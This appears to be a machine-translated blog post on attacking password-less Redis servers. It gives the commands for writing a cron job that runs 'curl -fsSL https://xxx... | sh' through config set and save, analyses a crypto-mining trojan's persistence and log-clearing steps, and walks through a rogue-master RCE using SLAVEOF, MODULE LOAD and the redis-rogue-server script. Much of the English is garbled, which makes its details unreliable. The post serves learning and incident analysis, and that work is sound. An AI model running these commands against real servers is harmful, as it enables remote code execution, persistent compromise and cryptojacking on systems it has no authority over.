Some time ago redis develop their own use when engaged in a docker, and then open a direct connection without a password, in fact, the beginning, I knew this would be swept into production and then give me a black stallion, but also because the testing service, in fact, not how He got the idea, so he laissez-faire, and sure enough the next day received a fresh horse. Then simply do an analysis of its invasion and found no attack can succeed, but since the Trojans simply see it.
0X01 briefly review process redis attack
1. Conditions attack
(1) a blank password and allows direct external connection
Note: This is actually a lot of details
Because after 3.2 With protected mode, protected mode is in effect no password and no configuration bind address when forced to only allow the unit is connected, but for binding address or password is configured through service in terms of this one can ignore.
There is also a misunderstanding that this binding address is not binding outside the address, but bind itself as to allow the server IP address to connect with the outside, such as external network IP bindings own servers, or binding 127.0.0.1 or binding 0.0.0.0, 0.0.0.0 of this binding is to bind all of their server ip address (ip server can have a lot of, such as network ip, ip loop, external network IP, etc.), so in fact for general servers, bind your own external network ip 0.0.0.0 is not binding and direct distinction, without setting a password to go outside the network ip bindings not have any protective effect, because the return address is bound to make Protected mode failure of the attack.
Digression is to say: if you want to set up a security password empty will bind the network address, otherwise it honestly password
(2) the use of root privileges to start redis
Highly privileged user starts the program and start the program the user has the same permission, which greatly benefit the attacker With such a high after controlling authority to modify the high redis rights profiles to complete the attack (but now start the default version of the high redis redis are the authority rather than the original root privileges)
(3) redis did not modify the default port in the absence of protective measures
The default port is 6379, it is easy to be swept
(4) supplement
Crontab execution used in Ubuntu is sh, sh and soft connection is dash, rather than bash, so if you write directly on the cron bash inside - i xx rebound is unlikely to be successful, there are two solutions, one is using Python calls / bin / sh rebound shell, there is a possible attempt to write sh file, and then use cron to perform
2. The use of the mechanism of attack
redis attack is the use of persistent storage RDB redis or AOF (not turned on by default), the so-called persistence is a kind of snapshot mechanism for post-recovery data. For example, RDB can under certain conditions, the current number is stored into the memory of a dump.rdb file, if the next time you want to restore the data, then you need to save this file in the directory under the snapshot redis, replacing the current dump. rdb restart again so that we can recover the original data
RDB trigger mechanism are the following
1 within a specified time interval, a specified number of write operations performed ----> can be set via the configuration file
2 Do save (blocked, just save a snapshot, others wait) or bgsave (asynchronous) command - "manually save
3 flushall command execution, empty database for all data -> Clear All Key will also clear the current rdb
4 Run the shutdown command to ensure normal server shut down without losing any data ----> well preserved data is not cleared
3. The process probably attack
Rdb file storage path (1) for root redis modified user profile crontab
Setting regular tasks directory to dir
config set dir "/var/spool/cron"
Set hold rdb file named root
config set dbfilename root
(2) use the database to clear FLUSHALL
127.0.0.1:6379> flushall
OK
This step is mainly want to clear the contents of the original root file, but also to avoid unnecessary malformed
(3) our cron written statement in redis
127.0.0.1:6379> the SET the Test "\ the n-* / 10 * * * * curl -fsSL https://xxx.xxx.xxx.xxx/xxx/xx | SH \ the n-"
the OK
line breaks here is to achieve write fashionable good format because when cron is read line by line reading encountered an incorrect format is discarded
(4) to force the update trigger rdb
127.0.0.1:6379> save
So far our cron data is written to the root folder of the user of the cron
(5) Summary:
In addition to cron can write, write a sentence webshell also possible, in fact, can be clearly seen, redis addition to the successful attack depends on the configuration mistakes outside the authority, as well as a word webshell cron to the required format is not strictly one of the important factor.
0X02 to return to the Trojans analysis
The attacker is the same, directly flushall all of my key, then write me direct a cron called back, each minutes to download a script to run from his server.
* * * * * curl -fsSL https://xxx.xxx.xxx.xxx/xxx/xx | sh
-f: no output error
-s: silent no output
-S: -s output error under conditions
-L: follow redirects
In determining the attackers did not succeed in the future, I downloaded a Trojan horse, then simply analyzed to see if there is no operation I did not detect.
1. The overall look of calling the main function
It can be said to be very clear and concise, and began to run after the horse in turn calls
mark()
background()
sethosts()
checkhost()
checkzigw()
initfiles() checkcrontab() checkssh() kill() checkservice() clean()
From the function name probably will be able to know the Trojans done, crontab ssh hosts file should have made changes, we'll take a look one by one.
2.mark()
Simply create a command and executed by the sys function, this command does is create an empty file, the mark () function can guess the name of the file to this effect may be empty as a Trojan horse that has not run successfully mark up
3.background()
Setting process running in the background, and change the working directory to the root directory
4.checkhost ()
Delete the original host of the hosts file and then re-create an empty hosts file, and add a series of domain names point to 127.0.0.1
These are some of the domain name through the mine pool access
5.checkzigw()
Whether there is a detection system / etc / zigw, / tmp / zigw, / etc / zjgw, these documents, if any, to the end of the corresponding process and delete the corresponding files
Where: chattr -ia This command is off may make the file can not be deleted attribute, concrete can see here
6.initfiles()
The main role of this function is to download the Trojan mining and modify rm, will first detect the current authority, if it took root Trojan downloaded to the / etc directory, if not the root, then downloaded to the / tmp directory
root privileges
Non-root privileges
In addition to downloading pdvs, also downloaded httpdz and migrations of these two documents, except if there is an alternative system to the rm command with root privileges operation
rm file has only one function, since replacing the file, then it must be very critical thing, we have to analyze
What is the address of this script is it? Look at the cross curlurl variable references
In fact, sh file that is downloaded from our analysis of the top, that is replaced here is actually a double insurance
7.checkcrontab()
This function is mainly to / var / spool / cron / root contents of this file to check to see if there is content to write, if not then invoke the command rewritten
In addition there is also the use of the chattr command to add additional attributes of the file and delete the file content to be easily modified, for example:
chattr + i prevent a critical system file is modified
chadttr + a make a file only append data entered, but can not be deleted
8.checkssh()
With root privileges can perform this function, check /root/.ssh/authorized_keys exists, it does not exist recreate
9.kill()
Clean up some processes and files you created
10.checkservice()
Detection system services to create their own existence, if it is set to boot from the start, if it does not exist to re-create the service, the service is to download the role of the presence of this Trojan
The figure below shows the contents of testing services which is not the custom of
If so then added to the system and open services
If it detects content has been modified, then delete the service, and re-create
11.clean()
The main role of this function is to remove some of the traces, such as traces including history and logon
0X03 copied from the master using Redis RCE
1. Basic principles
This attack method is custom module from the main Redis replication, as well as newly introduced Redis4.x loading function.
(1) briefly explain these two concepts
The concept of the master-slave replication:
Redis is an open source written in ANSI C, support network, based on memory, optional persistent key-value pairs stored in the database. Although Redi s read and write speed is very fast, but if and when the data is stored in a single instance of Redis, for the client to read, then the server is likely to produce a pressure reading unbearable.
In order to alleviate this pressure, the master copy emerged from such a mechanism, master-slave mode refers to the use of a redis instance as the host (master), other examples are as a slave (slave), the host is only responsible for writing data from many machine is responsible for reading, which we often like to say CDN load balancing function, as shown below
Then the master-slave replication is how it?
We focus on the RDB file section, we can find the master-slave replication relies on or before we often use RDB files, synchronize it, and mysql slave and master the use Binlog to recover data is the same.
Redis 4.x custom module is loaded:
Redis beginning with version 4.0 added support for external expansion modules (in fact, just before redis support in the unstable version of the community of custom modules). External expansion modules can achieve a new Redis commands, the new Redis data structures, in short, all the things that can be done basically Redis kernel can do.
Redis modules need to introduce redismodule.h, with C, C ++ or C binding offer other development language, and compiled DLL .so file.
Loading module, a method is loaded at boot using Redis loadmodule /path/to/mymodule.so redis.conf in the configuration file. Another way to use the command at runtime MODULE LOAD /path/to/mymodule.so loaded. Loaded modules can use the command MODULE LIST view, use the MODULE UNLOAD mymodule unloaded.
After we loaded the module can directly execute commands our custom in the module, which is a bit like the UDF MYSQL (in fact, a reason)
(2) together with the two
slave replication mechanism can be obtained from the master from master to rdb file, so we can not write a "rogue server" to simulate the master then our custom module from passing through the primary replication mechanism to the slave, slave end as long as will save us pass to the rdb files into a .so file and then go to a module loaded, our attack is complete
2. The advantage of using this kind of method
Using this method of attack can be the perfect solution to the following two questions, RCE implemented directly on the target machine
1. High-start the default version is redis redis permission to start, which means that we can not write crontab (write crontab file format modification is disabled and can only be modified by interaction crontab -e, but we did not use) , you can write redis user's ssh key, but because it is low-rights user, less harmful, of course, we can write webshell (provided there is a web service installed on this server)
2.ubuntu server actually use bash rebound more strenuous, can only consider using python
3. Use Conditions
Redis 4.x
You can remotely connect to the target server redis
4. Use of the basic steps
In fact, we have said above, and then refine it here
(1) executed on the target, his vps to master: SLAVEOF vps port
(2) executed on the target, set about dbfilename to xxx.so file
(3) by synchronizing the module file to disk target: FULLRESYNC <Z * 40> 1 \ r \ n $ \ r \ n (4) executed on the target, the load module: MODULE LOAD / tmp / exp. so
5. Use demo
(1) Download the image as an injured drone redis 4.0
docker pull redis:4.0
(2) interactively run-time image, the port 6379 is mapped to the host port 6666
docker run -p 6666:6379 -it 67f7ad418fdf /bin/bash
(3) to start the service in the docker in redis
redis-server
(4) After the start we can connect remotely look at the results
You can see the success of the distal end of my redis no access to the database, and can insert data
(5) clone attack script host (fork down from the git master of soil added a .so)
git clone https://github.com/K0rz3n/redis-rogue-server-1.git
(6) Run the script
python3 redis-rogue-server .py --rhost 127 .0 .0 .1 --rport 6666 --lhost xxx .xxx .xxx .xxx --lport 2333
After running the script drones will put our own lhost as master and as a slave, and synchronizes data
Drone operating results:
Rogue server operating results:
Note: 127 is in fact the drone, on behalf of my xxx "rogue server"
(7) View now redis server
Can be seen, the database is now read-only mode and become a slave
(8) command execution
